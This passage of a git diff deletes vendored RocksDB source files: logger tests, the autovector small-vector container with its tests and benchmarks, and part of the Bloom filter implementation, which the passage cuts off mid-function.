-      ROCKS_LOG_ERROR(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_FATAL(&logger, "%s", kSampleMessage.c_str());
-      log_lines += InfoLogLevel::HEADER_LEVEL - log_level + 1;
-    }
-  }
-  std::ifstream inFile(AutoRollLoggerTest::kLogFile.c_str());
-  size_t lines = std::count(std::istreambuf_iterator<char>(inFile),
-                         std::istreambuf_iterator<char>(), '\n');
-  ASSERT_EQ(log_lines, lines);
-  inFile.close();
-}
-
-// Test the logger Header function for roll over logs
-// We expect the new logs creates as roll over to carry the headers specified
-static std::vector<std::string> GetOldFileNames(const std::string& path) {
-  std::vector<std::string> ret;
-
-  const std::string dirname = path.substr(/*start=*/0, path.find_last_of("/"));
-  const std::string fname = path.substr(path.find_last_of("/") + 1);
-
-  std::vector<std::string> children;
-  Env::Default()->GetChildren(dirname, &children);
-
-  // We know that the old log files are named [path]<something>
-  // Return all entities that match the pattern
-  for (auto& child : children) {
-    if (fname != child && child.find(fname) == 0) {
-      ret.push_back(dirname + "/" + child);
-    }
-  }
-
-  return ret;
-}
-
-// Return the number of lines where a given pattern was found in the file
-static size_t GetLinesCount(const std::string& fname,
-                            const std::string& pattern) {
-  std::stringstream ssbuf;
-  std::string line;
-  size_t count = 0;
-
-  std::ifstream inFile(fname.c_str());
-  ssbuf << inFile.rdbuf();
-
-  while (getline(ssbuf, line)) {
-    if (line.find(pattern) != std::string::npos) {
-      count++;
-    }
-  }
-
-  return count;
-}
-
-TEST_F(AutoRollLoggerTest, LogHeaderTest) {
-  static const size_t MAX_HEADERS = 10;
-  static const size_t LOG_MAX_SIZE = 1024 * 5;
-  static const std::string HEADER_STR = "Log header line";
-
-  // test_num == 0 -> standard call to Header()
-  // test_num == 1 -> call to Log() with InfoLogLevel::HEADER_LEVEL
-  for (int test_num = 0; test_num < 2; test_num++) {
-
-    InitTestDb();
-
-    AutoRollLogger logger(Env::Default(), kTestDir, /*db_log_dir=*/ "",
-                          LOG_MAX_SIZE, /*log_file_time_to_roll=*/ 0);
-
-    if (test_num == 0) {
-      // Log some headers explicitly using Header()
-      for (size_t i = 0; i < MAX_HEADERS; i++) {
-        Header(&logger, "%s %d", HEADER_STR.c_str(), i);
-      }
-    } else if (test_num == 1) {
-      // HEADER_LEVEL should make this behave like calling Header()
-      for (size_t i = 0; i < MAX_HEADERS; i++) {
-        ROCKS_LOG_HEADER(&logger, "%s %d", HEADER_STR.c_str(), i);
-      }
-    }
-
-    const std::string newfname = logger.TEST_log_fname();
-
-    // Log enough data to cause a roll over
-    int i = 0;
-    for (size_t iter = 0; iter < 2; iter++) {
-      while (logger.GetLogFileSize() < LOG_MAX_SIZE) {
-        Info(&logger, (kSampleMessage + ":LogHeaderTest line %d").c_str(), i);
-        ++i;
-      }
-
-      Info(&logger, "Rollover");
-    }
-
-    // Flush the log for the latest file
-    LogFlush(&logger);
-
-    const auto oldfiles = GetOldFileNames(newfname);
-
-    ASSERT_EQ(oldfiles.size(), (size_t) 2);
-
-    for (auto& oldfname : oldfiles) {
-      // verify that the files rolled over
-      ASSERT_NE(oldfname, newfname);
-      // verify that the old log contains all the header logs
-      ASSERT_EQ(GetLinesCount(oldfname, HEADER_STR), MAX_HEADERS);
-    }
-  }
-}
-
-TEST_F(AutoRollLoggerTest, LogFileExistence) {
-  rocksdb::DB* db;
-  rocksdb::Options options;
-#ifdef OS_WIN
-  // Replace all slashes in the path so windows CompSpec does not
-  // become confused
-  std::string testDir(kTestDir);
-  std::replace_if(testDir.begin(), testDir.end(),
-    [](char ch) { return ch == '/'; }, '\\');
-  std::string deleteCmd = "if exist " + testDir + " rd /s /q " + testDir;
-#else
-  std::string deleteCmd = "rm -rf " + kTestDir;
-#endif
-  ASSERT_EQ(system(deleteCmd.c_str()), 0);
-  options.max_log_file_size = 100 * 1024 * 1024;
-  options.create_if_missing = true;
-  ASSERT_OK(rocksdb::DB::Open(options, kTestDir, &db));
-  ASSERT_OK(default_env->FileExists(kLogFile));
-  delete db;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as AutoRollLogger is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/autovector.h b/thirdparty/rocksdb/util/autovector.h
deleted file mode 100644
index b5c8471..0000000
--- a/thirdparty/rocksdb/util/autovector.h
+++ /dev/null
@@ -1,338 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <algorithm>
-#include <cassert>
-#include <initializer_list>
-#include <iterator>
-#include <stdexcept>
-#include <vector>
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_LITE
-template <class T, size_t kSize = 8>
-class autovector : public std::vector<T> {
-  using std::vector<T>::vector;
-};
-#else
-// A vector that leverages pre-allocated stack-based array to achieve better
-// performance for array with small amount of items.
-//
-// The interface resembles that of vector, but with less features since we aim
-// to solve the problem that we have in hand, rather than implementing a
-// full-fledged generic container.
-//
-// Currently we don't support:
-//  * reserve()/shrink_to_fit()
-//     If used correctly, in most cases, people should not touch the
-//     underlying vector at all.
-//  * random insert()/erase(), please only use push_back()/pop_back().
-//  * No move/swap operations. Each autovector instance has a
-//     stack-allocated array and if we want support move/swap operations, we
-//     need to copy the arrays other than just swapping the pointers. In this
-//     case we'll just explicitly forbid these operations since they may
-//     lead users to make false assumption by thinking they are inexpensive
-//     operations.
-//
-// Naming style of public methods almost follows that of the STL's.
-template <class T, size_t kSize = 8>
-class autovector {
- public:
-  // General STL-style container member types.
-  typedef T value_type;
-  typedef typename std::vector<T>::difference_type difference_type;
-  typedef typename std::vector<T>::size_type size_type;
-  typedef value_type& reference;
-  typedef const value_type& const_reference;
-  typedef value_type* pointer;
-  typedef const value_type* const_pointer;
-
-  // This class is the base for regular/const iterator
-  template <class TAutoVector, class TValueType>
-  class iterator_impl {
-   public:
-    // -- iterator traits
-    typedef iterator_impl<TAutoVector, TValueType> self_type;
-    typedef TValueType value_type;
-    typedef TValueType& reference;
-    typedef TValueType* pointer;
-    typedef typename TAutoVector::difference_type difference_type;
-    typedef std::random_access_iterator_tag iterator_category;
-
-    iterator_impl(TAutoVector* vect, size_t index)
-        : vect_(vect), index_(index) {};
-    iterator_impl(const iterator_impl&) = default;
-    ~iterator_impl() {}
-    iterator_impl& operator=(const iterator_impl&) = default;
-
-    // -- Advancement
-    // ++iterator
-    self_type& operator++() {
-      ++index_;
-      return *this;
-    }
-
-    // iterator++
-    self_type operator++(int) {
-      auto old = *this;
-      ++index_;
-      return old;
-    }
-
-    // --iterator
-    self_type& operator--() {
-      --index_;
-      return *this;
-    }
-
-    // iterator--
-    self_type operator--(int) {
-      auto old = *this;
-      --index_;
-      return old;
-    }
-
-    self_type operator-(difference_type len) const {
-      return self_type(vect_, index_ - len);
-    }
-
-    difference_type operator-(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ - other.index_;
-    }
-
-    self_type operator+(difference_type len) const {
-      return self_type(vect_, index_ + len);
-    }
-
-    self_type& operator+=(difference_type len) {
-      index_ += len;
-      return *this;
-    }
-
-    self_type& operator-=(difference_type len) {
-      index_ -= len;
-      return *this;
-    }
-
-    // -- Reference
-    reference operator*() {
-      assert(vect_->size() >= index_);
-      return (*vect_)[index_];
-    }
-
-    const_reference operator*() const {
-      assert(vect_->size() >= index_);
-      return (*vect_)[index_];
-    }
-
-    pointer operator->() {
-      assert(vect_->size() >= index_);
-      return &(*vect_)[index_];
-    }
-
-    const_pointer operator->() const {
-      assert(vect_->size() >= index_);
-      return &(*vect_)[index_];
-    }
-
-
-    // -- Logical Operators
-    bool operator==(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ == other.index_;
-    }
-
-    bool operator!=(const self_type& other) const { return !(*this == other); }
-
-    bool operator>(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ > other.index_;
-    }
-
-    bool operator<(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ < other.index_;
-    }
-
-    bool operator>=(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ >= other.index_;
-    }
-
-    bool operator<=(const self_type& other) const {
-      assert(vect_ == other.vect_);
-      return index_ <= other.index_;
-    }
-
-   private:
-    TAutoVector* vect_ = nullptr;
-    size_t index_ = 0;
-  };
-
-  typedef iterator_impl<autovector, value_type> iterator;
-  typedef iterator_impl<const autovector, const value_type> const_iterator;
-  typedef std::reverse_iterator<iterator> reverse_iterator;
-  typedef std::reverse_iterator<const_iterator> const_reverse_iterator;
-
-  autovector() = default;
-
-  autovector(std::initializer_list<T> init_list) {
-    for (const T& item : init_list) {
-      push_back(item);
-    }
-  }
-
-  ~autovector() = default;
-
-  // -- Immutable operations
-  // Indicate if all data resides in in-stack data structure.
-  bool only_in_stack() const {
-    // If no element was inserted at all, the vector's capacity will be `0`.
-    return vect_.capacity() == 0;
-  }
-
-  size_type size() const { return num_stack_items_ + vect_.size(); }
-
-  // resize does not guarantee anything about the contents of the newly
-  // available elements
-  void resize(size_type n) {
-    if (n > kSize) {
-      vect_.resize(n - kSize);
-      num_stack_items_ = kSize;
-    } else {
-      vect_.clear();
-      num_stack_items_ = n;
-    }
-  }
-
-  bool empty() const { return size() == 0; }
-
-  const_reference operator[](size_type n) const {
-    assert(n < size());
-    return n < kSize ? values_[n] : vect_[n - kSize];
-  }
-
-  reference operator[](size_type n) {
-    assert(n < size());
-    return n < kSize ? values_[n] : vect_[n - kSize];
-  }
-
-  const_reference at(size_type n) const {
-    assert(n < size());
-    return (*this)[n];
-  }
-
-  reference at(size_type n) {
-    assert(n < size());
-    return (*this)[n];
-  }
-
-  reference front() {
-    assert(!empty());
-    return *begin();
-  }
-
-  const_reference front() const {
-    assert(!empty());
-    return *begin();
-  }
-
-  reference back() {
-    assert(!empty());
-    return *(end() - 1);
-  }
-
-  const_reference back() const {
-    assert(!empty());
-    return *(end() - 1);
-  }
-
-  // -- Mutable Operations
-  void push_back(T&& item) {
-    if (num_stack_items_ < kSize) {
-      values_[num_stack_items_++] = std::move(item);
-    } else {
-      vect_.push_back(item);
-    }
-  }
-
-  void push_back(const T& item) {
-    if (num_stack_items_ < kSize) {
-      values_[num_stack_items_++] = item;
-    } else {
-      vect_.push_back(item);
-    }
-  }
-
-  template <class... Args>
-  void emplace_back(Args&&... args) {
-    push_back(value_type(args...));
-  }
-
-  void pop_back() {
-    assert(!empty());
-    if (!vect_.empty()) {
-      vect_.pop_back();
-    } else {
-      --num_stack_items_;
-    }
-  }
-
-  void clear() {
-    num_stack_items_ = 0;
-    vect_.clear();
-  }
-
-  // -- Copy and Assignment
-  autovector& assign(const autovector& other);
-
-  autovector(const autovector& other) { assign(other); }
-
-  autovector& operator=(const autovector& other) { return assign(other); }
-
-  // -- Iterator Operations
-  iterator begin() { return iterator(this, 0); }
-
-  const_iterator begin() const { return const_iterator(this, 0); }
-
-  iterator end() { return iterator(this, this->size()); }
-
-  const_iterator end() const { return const_iterator(this, this->size()); }
-
-  reverse_iterator rbegin() { return reverse_iterator(end()); }
-
-  const_reverse_iterator rbegin() const {
-    return const_reverse_iterator(end());
-  }
-
-  reverse_iterator rend() { return reverse_iterator(begin()); }
-
-  const_reverse_iterator rend() const {
-    return const_reverse_iterator(begin());
-  }
-
- private:
-  size_type num_stack_items_ = 0;  // current number of items
-  value_type values_[kSize];       // the first `kSize` items
-  // used only if there are more than `kSize` items.
-  std::vector<T> vect_;
-};
-
-template <class T, size_t kSize>
-autovector<T, kSize>& autovector<T, kSize>::assign(const autovector& other) {
-  // copy the internal vector
-  vect_.assign(other.vect_.begin(), other.vect_.end());
-
-  // copy array
-  num_stack_items_ = other.num_stack_items_;
-  std::copy(other.values_, other.values_ + num_stack_items_, values_);
-
-  return *this;
-}
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/autovector_test.cc b/thirdparty/rocksdb/util/autovector_test.cc
deleted file mode 100644
index 2d7bcea..0000000
--- a/thirdparty/rocksdb/util/autovector_test.cc
+++ /dev/null
@@ -1,327 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <atomic>
-#include <iostream>
-#include <string>
-#include <utility>
-
-#include "rocksdb/env.h"
-#include "util/autovector.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using std::cout;
-using std::endl;
-
-namespace rocksdb {
-
-class AutoVectorTest : public testing::Test {};
-const unsigned long kSize = 8;
-
-namespace {
-template <class T>
-void AssertAutoVectorOnlyInStack(autovector<T, kSize>* vec, bool result) {
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ(vec->only_in_stack(), result);
-#endif  // !ROCKSDB_LITE
-}
-}  // namespace
-
-TEST_F(AutoVectorTest, PushBackAndPopBack) {
-  autovector<size_t, kSize> vec;
-  ASSERT_TRUE(vec.empty());
-  ASSERT_EQ(0ul, vec.size());
-
-  for (size_t i = 0; i < 1000 * kSize; ++i) {
-    vec.push_back(i);
-    ASSERT_TRUE(!vec.empty());
-    if (i < kSize) {
-      AssertAutoVectorOnlyInStack(&vec, true);
-    } else {
-      AssertAutoVectorOnlyInStack(&vec, false);
-    }
-    ASSERT_EQ(i + 1, vec.size());
-    ASSERT_EQ(i, vec[i]);
-    ASSERT_EQ(i, vec.at(i));
-  }
-
-  size_t size = vec.size();
-  while (size != 0) {
-    vec.pop_back();
-    // will always be in heap
-    AssertAutoVectorOnlyInStack(&vec, false);
-    ASSERT_EQ(--size, vec.size());
-  }
-
-  ASSERT_TRUE(vec.empty());
-}
-
-TEST_F(AutoVectorTest, EmplaceBack) {
-  typedef std::pair<size_t, std::string> ValType;
-  autovector<ValType, kSize> vec;
-
-  for (size_t i = 0; i < 1000 * kSize; ++i) {
-    vec.emplace_back(i, ToString(i + 123));
-    ASSERT_TRUE(!vec.empty());
-    if (i < kSize) {
-      AssertAutoVectorOnlyInStack(&vec, true);
-    } else {
-      AssertAutoVectorOnlyInStack(&vec, false);
-    }
-
-    ASSERT_EQ(i + 1, vec.size());
-    ASSERT_EQ(i, vec[i].first);
-    ASSERT_EQ(ToString(i + 123), vec[i].second);
-  }
-
-  vec.clear();
-  ASSERT_TRUE(vec.empty());
-  AssertAutoVectorOnlyInStack(&vec, false);
-}
-
-TEST_F(AutoVectorTest, Resize) {
-  autovector<size_t, kSize> vec;
-
-  vec.resize(kSize);
-  AssertAutoVectorOnlyInStack(&vec, true);
-  for (size_t i = 0; i < kSize; ++i) {
-    vec[i] = i;
-  }
-
-  vec.resize(kSize * 2);
-  AssertAutoVectorOnlyInStack(&vec, false);
-  for (size_t i = 0; i < kSize; ++i) {
-    ASSERT_EQ(vec[i], i);
-  }
-  for (size_t i = 0; i < kSize; ++i) {
-    vec[i + kSize] = i;
-  }
-
-  vec.resize(1);
-  ASSERT_EQ(1U, vec.size());
-}
-
-namespace {
-void AssertEqual(
-    const autovector<size_t, kSize>& a, const autovector<size_t, kSize>& b) {
-  ASSERT_EQ(a.size(), b.size());
-  ASSERT_EQ(a.empty(), b.empty());
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ(a.only_in_stack(), b.only_in_stack());
-#endif  // !ROCKSDB_LITE
-  for (size_t i = 0; i < a.size(); ++i) {
-    ASSERT_EQ(a[i], b[i]);
-  }
-}
-}  // namespace
-
-TEST_F(AutoVectorTest, CopyAndAssignment) {
-  // Test both heap-allocated and stack-allocated cases.
-  for (auto size : { kSize / 2, kSize * 1000 }) {
-    autovector<size_t, kSize> vec;
-    for (size_t i = 0; i < size; ++i) {
-      vec.push_back(i);
-    }
-
-    {
-      autovector<size_t, kSize> other;
-      other = vec;
-      AssertEqual(other, vec);
-    }
-
-    {
-      autovector<size_t, kSize> other(vec);
-      AssertEqual(other, vec);
-    }
-  }
-}
-
-TEST_F(AutoVectorTest, Iterators) {
-  autovector<std::string, kSize> vec;
-  for (size_t i = 0; i < kSize * 1000; ++i) {
-    vec.push_back(ToString(i));
-  }
-
-  // basic operator test
-  ASSERT_EQ(vec.front(), *vec.begin());
-  ASSERT_EQ(vec.back(), *(vec.end() - 1));
-  ASSERT_TRUE(vec.begin() < vec.end());
-
-  // non-const iterator
-  size_t index = 0;
-  for (const auto& item : vec) {
-    ASSERT_EQ(vec[index++], item);
-  }
-
-  index = vec.size() - 1;
-  for (auto pos = vec.rbegin(); pos != vec.rend(); ++pos) {
-    ASSERT_EQ(vec[index--], *pos);
-  }
-
-  // const iterator
-  const auto& cvec = vec;
-  index = 0;
-  for (const auto& item : cvec) {
-    ASSERT_EQ(cvec[index++], item);
-  }
-
-  index = vec.size() - 1;
-  for (auto pos = cvec.rbegin(); pos != cvec.rend(); ++pos) {
-    ASSERT_EQ(cvec[index--], *pos);
-  }
-
-  // forward and backward
-  auto pos = vec.begin();
-  while (pos != vec.end()) {
-    auto old_val = *pos;
-    auto old = pos++;
-    // HACK: make sure -> works
-    ASSERT_TRUE(!old->empty());
-    ASSERT_EQ(old_val, *old);
-    ASSERT_TRUE(pos == vec.end() || old_val != *pos);
-  }
-
-  pos = vec.begin();
-  for (size_t i = 0; i < vec.size(); i += 2) {
-    // Cannot use ASSERT_EQ since that macro depends on iostream serialization
-    ASSERT_TRUE(pos + 2 - 2 == pos);
-    pos += 2;
-    ASSERT_TRUE(pos >= vec.begin());
-    ASSERT_TRUE(pos <= vec.end());
-
-    size_t diff = static_cast<size_t>(pos - vec.begin());
-    ASSERT_EQ(i + 2, diff);
-  }
-}
-
-namespace {
-std::vector<std::string> GetTestKeys(size_t size) {
-  std::vector<std::string> keys;
-  keys.resize(size);
-
-  int index = 0;
-  for (auto& key : keys) {
-    key = "item-" + rocksdb::ToString(index++);
-  }
-  return keys;
-}
-}  // namespace
-
-template <class TVector>
-void BenchmarkVectorCreationAndInsertion(
-    std::string name, size_t ops, size_t item_size,
-    const std::vector<typename TVector::value_type>& items) {
-  auto env = Env::Default();
-
-  int index = 0;
-  auto start_time = env->NowNanos();
-  auto ops_remaining = ops;
-  while(ops_remaining--) {
-    TVector v;
-    for (size_t i = 0; i < item_size; ++i) {
-      v.push_back(items[index++]);
-    }
-  }
-  auto elapsed = env->NowNanos() - start_time;
-  cout << "created " << ops << " " << name << " instances:\n\t"
-       << "each was inserted with " << item_size << " elements\n\t"
-       << "total time elapsed: " << elapsed << " (ns)" << endl;
-}
-
-template <class TVector>
-size_t BenchmarkSequenceAccess(std::string name, size_t ops, size_t elem_size) {
-  TVector v;
-  for (const auto& item : GetTestKeys(elem_size)) {
-    v.push_back(item);
-  }
-  auto env = Env::Default();
-
-  auto ops_remaining = ops;
-  auto start_time = env->NowNanos();
-  size_t total = 0;
-  while (ops_remaining--) {
-    auto end = v.end();
-    for (auto pos = v.begin(); pos != end; ++pos) {
-      total += pos->size();
-    }
-  }
-  auto elapsed = env->NowNanos() - start_time;
-  cout << "performed " << ops << " sequence access against " << name << "\n\t"
-       << "size: " << elem_size << "\n\t"
-       << "total time elapsed: " << elapsed << " (ns)" << endl;
-  // HACK avoid compiler's optimization to ignore total
-  return total;
-}
-
-// This test case only reports the performance between std::vector<std::string>
-// and autovector<std::string>. We chose string for comparison because in most
-// of our use cases we used std::vector<std::string>.
-TEST_F(AutoVectorTest, PerfBench) {
-  // We run same operations for kOps times in order to get a more fair result.
-  size_t kOps = 100000;
-
-  // Creation and insertion test
-  // Test the case when there is:
-  //  * no element inserted: internal array of std::vector may not really get
-  //    initialize.
-  //  * one element inserted: internal array of std::vector must have
-  //    initialized.
-  //  * kSize elements inserted. This shows the most time we'll spend if we
-  //    keep everything in stack.
-  //  * 2 * kSize elements inserted. The internal vector of
-  //    autovector must have been initialized.
-  cout << "=====================================================" << endl;
-  cout << "Creation and Insertion Test (value type: std::string)" << endl;
-  cout << "=====================================================" << endl;
-
-  // pre-generated unique keys
-  auto string_keys = GetTestKeys(kOps * 2 * kSize);
-  for (auto insertions : { 0ul, 1ul, kSize / 2, kSize, 2 * kSize }) {
-    BenchmarkVectorCreationAndInsertion<std::vector<std::string>>(
-        "std::vector<std::string>", kOps, insertions, string_keys);
-    BenchmarkVectorCreationAndInsertion<autovector<std::string, kSize>>(
-        "autovector<std::string>", kOps, insertions, string_keys);
-    cout << "-----------------------------------" << endl;
-  }
-
-  cout << "=====================================================" << endl;
-  cout << "Creation and Insertion Test (value type: uint64_t)" << endl;
-  cout << "=====================================================" << endl;
-
-  // pre-generated unique keys
-  std::vector<uint64_t> int_keys(kOps * 2 * kSize);
-  for (size_t i = 0; i < kOps * 2 * kSize; ++i) {
-    int_keys[i] = i;
-  }
-  for (auto insertions : { 0ul, 1ul, kSize / 2, kSize, 2 * kSize }) {
-    BenchmarkVectorCreationAndInsertion<std::vector<uint64_t>>(
-        "std::vector<uint64_t>", kOps, insertions, int_keys);
-    BenchmarkVectorCreationAndInsertion<autovector<uint64_t, kSize>>(
-      "autovector<uint64_t>", kOps, insertions, int_keys
-    );
-    cout << "-----------------------------------" << endl;
-  }
-
-  // Sequence Access Test
-  cout << "=====================================================" << endl;
-  cout << "Sequence Access Test" << endl;
-  cout << "=====================================================" << endl;
-  for (auto elem_size : { kSize / 2, kSize, 2 * kSize }) {
-    BenchmarkSequenceAccess<std::vector<std::string>>("std::vector", kOps,
-                                                      elem_size);
-    BenchmarkSequenceAccess<autovector<std::string, kSize>>("autovector", kOps,
-                                                            elem_size);
-    cout << "-----------------------------------" << endl;
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/bloom.cc b/thirdparty/rocksdb/util/bloom.cc
deleted file mode 100644
index 9af17f8..0000000
--- a/thirdparty/rocksdb/util/bloom.cc
+++ /dev/null
@@ -1,353 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/filter_policy.h"
-
-#include "rocksdb/slice.h"
-#include "table/block_based_filter_block.h"
-#include "table/full_filter_bits_builder.h"
-#include "table/full_filter_block.h"
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-class BlockBasedFilterBlockBuilder;
-class FullFilterBlockBuilder;
-
-FullFilterBitsBuilder::FullFilterBitsBuilder(const size_t bits_per_key,
-                                             const size_t num_probes)
-    : bits_per_key_(bits_per_key), num_probes_(num_probes) {
-  assert(bits_per_key_);
-  }
-
-  FullFilterBitsBuilder::~FullFilterBitsBuilder() {}
-
-  void FullFilterBitsBuilder::AddKey(const Slice& key) {
-    uint32_t hash = BloomHash(key);
-    if (hash_entries_.size() == 0 || hash != hash_entries_.back()) {
-      hash_entries_.push_back(hash);
-    }
-  }
-
-  Slice FullFilterBitsBuilder::Finish(std::unique_ptr<const char[]>* buf) {
-    uint32_t total_bits, num_lines;
-    char* data = ReserveSpace(static_cast<int>(hash_entries_.size()),
-                              &total_bits, &num_lines);
-    assert(data);
-
-    if (total_bits != 0 && num_lines != 0) {
-      for (auto h : hash_entries_) {
-        AddHash(h, data, num_lines, total_bits);
-      }
-    }
-    data[total_bits/8] = static_cast<char>(num_probes_);
-    EncodeFixed32(data + total_bits/8 + 1, static_cast<uint32_t>(num_lines));
-
-    const char* const_data = data;
-    buf->reset(const_data);
-    hash_entries_.clear();
-
-    return Slice(data, total_bits / 8 + 5);
-  }
-
-uint32_t FullFilterBitsBuilder::GetTotalBitsForLocality(uint32_t total_bits) {
-  uint32_t num_lines =
-      (total_bits + CACHE_LINE_SIZE * 8 - 1) / (CACHE_LINE_SIZE * 8);
-
-  // Make num_lines an odd number to make sure more bits are involved
-  // when determining which block.
-  if (num_lines % 2 == 0) {
-    num_lines++;
-  }
-  return num_lines * (CACHE_LINE_SIZE * 8);
-}
-
-uint32_t FullFilterBitsBuilder::CalculateSpace(const int num_entry,
-                                               uint32_t* total_bits,
-                                               uint32_t* num_lines) {
-  assert(bits_per_key_);
-  if (num_entry != 0) {
-    uint32_t total_bits_tmp = num_entry * static_cast<uint32_t>(bits_per_key_);
-
-    *total_bits = GetTotalBitsForLocality(total_bits_tmp);
-    *num_lines = *total_bits / (CACHE_LINE_SIZE * 8);
-    assert(*total_bits > 0 && *total_bits % 8 == 0);
-  } else {
-    // filter is empty, just leave space for metadata
-    *total_bits = 0;
-    *num_lines = 0;
-  }
-
-  // Reserve space for Filter
-  uint32_t sz = *total_bits / 8;
-  sz += 5;  // 4 bytes for num_lines, 1 byte for num_probes
-  return sz;
-}
-
-char* FullFilterBitsBuilder::ReserveSpace(const int num_entry,
-                                          uint32_t* total_bits,
-                                          uint32_t* num_lines) {
-  uint32_t sz = CalculateSpace(num_entry, total_bits, num_lines);
-  char* data = new char[sz];
-  memset(data, 0, sz);
-  return data;
-}
-
-int FullFilterBitsBuilder::CalculateNumEntry(const uint32_t space) {
-  assert(bits_per_key_);
-  assert(space > 0);
-  uint32_t dont_care1, dont_care2;
-  int high = (int) (space * 8 / bits_per_key_ + 1);
-  int low = 1;
-  int n = high;
-  for (; n >= low; n--) {
-    uint32_t sz = CalculateSpace(n, &dont_care1, &dont_care2);
-    if (sz <= space) {
-      break;
-    }
-  }
-  assert(n < high);  // High should be an overestimation
-  return n;
-}
-
-inline void FullFilterBitsBuilder::AddHash(uint32_t h, char* data,
-    uint32_t num_lines, uint32_t total_bits) {
-  assert(num_lines > 0 && total_bits > 0);
-
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  uint32_t b = (h % num_lines) * (CACHE_LINE_SIZE * 8);
-
-  for (uint32_t i = 0; i < num_probes_; ++i) {
-    // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-    // to a simple operation by compiler.
-    const uint32_t bitpos = b + (h % (CACHE_LINE_SIZE * 8));
-    data[bitpos / 8] |= (1 << (bitpos % 8));
-
-    h += delta;
-  }
-}
-
-namespace {
-class FullFilterBitsReader : public FilterBitsReader {
- public:
-  explicit FullFilterBitsReader(const Slice& contents)
-      : data_(const_cast<char*>(contents.data())),
-        data_len_(static_cast<uint32_t>(contents.size())),
-        num_probes_(0),
-        num_lines_(0) {
-    assert(data_);
-    GetFilterMeta(contents, &num_probes_, &num_lines_);
-    // Sanitize broken parameter
-    if (num_lines_ != 0 && (data_len_-5) % num_lines_ != 0) {
-      num_lines_ = 0;
-      num_probes_ = 0;
-    }
-  }
-
-  ~FullFilterBitsReader() {}
-
-  virtual bool MayMatch(const Slice& entry) override {
-    if (data_len_ <= 5) {   // remain same with original filter
-      return false;
-    }
-    // Other Error params, including a broken filter, regarded as match
-    if (num_probes_ == 0 || num_lines_ == 0) return true;
-    uint32_t hash = BloomHash(entry);
-    return HashMayMatch(hash, Slice(data_, data_len_),
-                        num_probes_, num_lines_);
-  }
-
- private:
-  // Filter meta data
-  char* data_;
-  uint32_t data_len_;
-  size_t num_probes_;
-  uint32_t num_lines_;
-
-  // Get num_probes, and num_lines from filter
-  // If filter format broken, set both to 0.
-  void GetFilterMeta(const Slice& filter, size_t* num_probes,
-                             uint32_t* num_lines);
-
-  // "filter" contains the data appended by a preceding call to
-  // CreateFilterFromHash() on this class.  This method must return true if
-  // the key was in the list of keys passed to CreateFilter().
-  // This method may return true or false if the key was not on the
-  // list, but it should aim to return false with a high probability.
-  //
-  // hash: target to be checked
-  // filter: the whole filter, including meta data bytes
-  // num_probes: number of probes, read before hand
-  // num_lines: filter metadata, read before hand
-  // Before calling this function, need to ensure the input meta data
-  // is valid.
-  bool HashMayMatch(const uint32_t& hash, const Slice& filter,
-      const size_t& num_probes, const uint32_t& num_lines);
-
-  // No Copy allowed
-  FullFilterBitsReader(const FullFilterBitsReader&);
-  void operator=(const FullFilterBitsReader&);
-};
-
-void FullFilterBitsReader::GetFilterMeta(const Slice& filter,
-    size_t* num_probes, uint32_t* num_lines) {
-  uint32_t len = static_cast<uint32_t>(filter.size());
-  if (len <= 5) {
-    // filter is empty or broken
-    *num_probes = 0;
-    *num_lines = 0;
-    return;
-  }
-
-  *num_probes = filter.data()[len - 5];
-  *num_lines = DecodeFixed32(filter.data() + len - 4);
-}
-
-bool FullFilterBitsReader::HashMayMatch(const uint32_t& hash,
-    const Slice& filter, const size_t& num_probes,
-    const uint32_t& num_lines) {
-  uint32_t len = static_cast<uint32_t>(filter.size());
-  if (len <= 5) return false;  // remain the same with original filter
-
-  // It is ensured the params are valid before calling it
-  assert(num_probes != 0);
-  assert(num_lines != 0 && (len - 5) % num_lines == 0);
-  uint32_t cache_line_size = (len - 5) / num_lines;
-  const char* data = filter.data();
-
-  uint32_t h = hash;
-  const uint32_t delta = (h >> 17) | (h << 15);  // Rotate right 17 bits
-  uint32_t b = (h % num_lines) * (cache_line_size * 8);
-
-  for (uint32_t i = 0; i < num_probes; ++i) {
-    // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-    //  to a simple and operation by compiler.
